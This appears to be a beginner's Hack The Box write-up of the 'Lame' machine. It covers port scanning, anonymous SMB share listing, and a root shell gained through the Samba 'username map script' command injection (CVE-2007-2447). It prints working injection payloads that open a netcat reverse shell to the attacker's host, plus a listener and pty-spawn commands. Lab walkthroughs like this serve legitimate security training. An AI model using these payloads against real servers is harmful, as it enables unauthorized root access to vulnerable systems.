Lame

infocard.png

About HackTheBox Lame Machine

Machine Creator: ch4p

IP: 10.10.10.3

This is a write-up of the machine Lame from Hack The Box. Hack The Box is a free online platform that lets you practice and advance your cybersecurity skills.

Lame is an "easy" rated box. There are two flags to retrieve from each Hack The Box machine: the user.txt flag and the root.txt flag.

Initial Recon

The first thing I did after connecting to the VPN was a port scan using Nmap.

nmap-lame.png

This initial scan shows that this is a Linux machine (which we already knew, because HTB tells you), which ports are open, and which services are running on them. There are a few services of interest.

We have an FTP server, an SSH server, and an SMB server. The FTP server allows anonymous login; following that rabbit hole, I also found a vulnerability affecting this version of the FTP server, but I was unable to exploit it at the time. I chose to look at SSH last, as it is typically a more secure service; however, we may come across credentials along the way that let us authenticate to SSH later on.

Exploiting Samba:

Samba is the open-source implementation of SMB (typically a Windows protocol) for Unix. Samba provides file sharing between Linux/Unix servers and Windows clients.
smbclient's -L option lists the services (shares) a server offers. I ran smbclient -L 10.10.10.3 to list the shares on the server (press Enter at the password prompt for an anonymous session).

samba-lame-L.png


The tmp share looked interesting. I connected to it with smbclient, using -N to skip the password prompt (an anonymous, or null-session, login):
smbclient -N //10.10.10.3/tmp


I did some looking around. I wasn't too familiar with SMB, so I stuck to basic commands.


smb-enum.png

As I said, I am not very familiar with SMB, but after some googling I found a helpful blog:

https://medium.com/@nmappn/exploiting-smb-samba-without-metasploit-series-1-b34291bbfd63

The share itself is not the vulnerability; the Samba version is. When the non-default "username map script" option is set (as it is on this box), this version of smbd passes the username from a logon attempt straight into a shell command line, so a username containing shell metacharacters runs whatever we put inside backticks, before authentication even happens (this is the Samba "username map script" command injection, CVE-2007-2447, affecting Samba 3.0.20 through 3.0.25rc3). We can therefore inject a command at logon to create an nc reverse shell.

First, set up a listener on the attack box:
nc -lvp 4444

Then, from the smbclient prompt, the backticks are what make the injected command run:
logon "/=`nc <attack box ip> 4444 -e /bin/bash`"

Similarly, we could have done:

logon "/=`nohup nc <attack box ip> 4444 -e /bin/bash`"

nohup keeps the nc child process running when the login attempt fails (it always fails; the map script never returns a valid user) and smbd tears down the session that spawned it. Note that the -e option requires a netcat build that supports it (netcat-traditional; the OpenBSD variant dropped it).

rev-shell.png

Once we receive the shell back, we can see that we have a shell on the box as root (smbd runs as root, and the injected command inherits that):

root-flag.png

Enumeration

Just for convenience, we will spawn a pty shell:
python -c 'import pty; pty.spawn("/bin/bash")'


pty.png

Since we already have root on this machine, we can read the user flag as well; we just need to find it. We can see that there is a user makis, and the user flag was found in /home/makis.

user-flag-looking.png

This was a strange order of operations compared with the HTB machines I have done so far: not a whole lot of privilege escalation going on here. But I thought it was a pretty cool box, and it is really nice for a beginner.
